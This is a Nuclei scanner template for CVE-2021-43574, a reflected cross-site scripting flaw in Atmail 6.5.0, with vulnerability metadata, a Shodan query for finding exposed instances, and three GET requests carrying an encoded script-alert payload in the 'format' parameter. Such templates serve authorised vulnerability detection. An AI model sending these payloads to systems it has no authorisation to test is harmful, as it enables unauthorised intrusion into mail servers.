nuclei-templates/http/cves/2021/CVE-2021-43574.yaml

60 lines
2.3 KiB
YAML
Raw Normal View History

2022-09-01 06:16:54 +00:00
id: CVE-2021-43574
info:
name: Atmail 6.5.0 - Cross-Site Scripting
2022-09-01 06:34:48 +00:00
author: arafatansari,ritikchaddha
severity: medium
2022-09-01 06:16:54 +00:00
description: |
Atmail 6.5.0 contains a cross-site scripting vulnerability in WebAdmin Control Pane via the format parameter to the default URI, which allows remote attackers to inject arbitrary web script or HTML via the “format” parameter.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:09:01 +00:00
remediation: |
Apply the latest security patches or updates provided by Atmail to fix the XSS vulnerability.
2022-09-01 06:16:54 +00:00
reference:
- https://medium.com/@bhattronit96/cve-2021-43574-696041dcab9e
- https://help.atmail.com/hc/en-us/sections/115003283988
- https://nvd.nist.gov/vuln/detail/CVE-2021-43574
- https://medium.com/%40bhattronit96/cve-2021-43574-696041dcab9e
2022-09-01 06:34:48 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-43574
cwe-id: CWE-79
epss-score: 0.0019
epss-percentile: 0.56439
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:*
2022-09-01 06:16:54 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:09:01 +00:00
max-request: 3
2023-07-11 19:49:27 +00:00
vendor: atmail
product: atmail
2023-09-06 12:09:01 +00:00
shodan-query: http.html:"Powered by Atmail"
2022-09-01 06:34:48 +00:00
tags: cve,cve2021,atmail,xss
2022-09-01 06:16:54 +00:00
http:
2022-09-01 06:34:48 +00:00
- method: GET
path:
- "{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- "{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- "{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2022-09-01 06:16:54 +00:00
2022-09-01 06:34:48 +00:00
stop-at-first-match: true
2023-07-11 19:49:27 +00:00
2022-09-01 06:16:54 +00:00
matchers-condition: and
matchers:
2022-09-01 06:34:48 +00:00
- type: word
part: body
words:
- '<script>alert(document.domain)</script>" does not exist'
2022-09-01 06:16:54 +00:00
- type: word
2022-09-01 06:34:48 +00:00
part: header
2022-09-01 06:16:54 +00:00
words:
2022-09-01 06:34:48 +00:00
- text/html
- type: status
status:
- 500
- 403
condition: or
# digest: 4a0a00473045022100ef7d4e14a4fcebb0c5b33bfd62e566b302bf628137befadff4b67e08dc6423e902202d9783f0480ce8d8616b14f1aade23111f15492d05d878d0626e3b050c1cff29:922c64590222798bb761d5b6d8e72950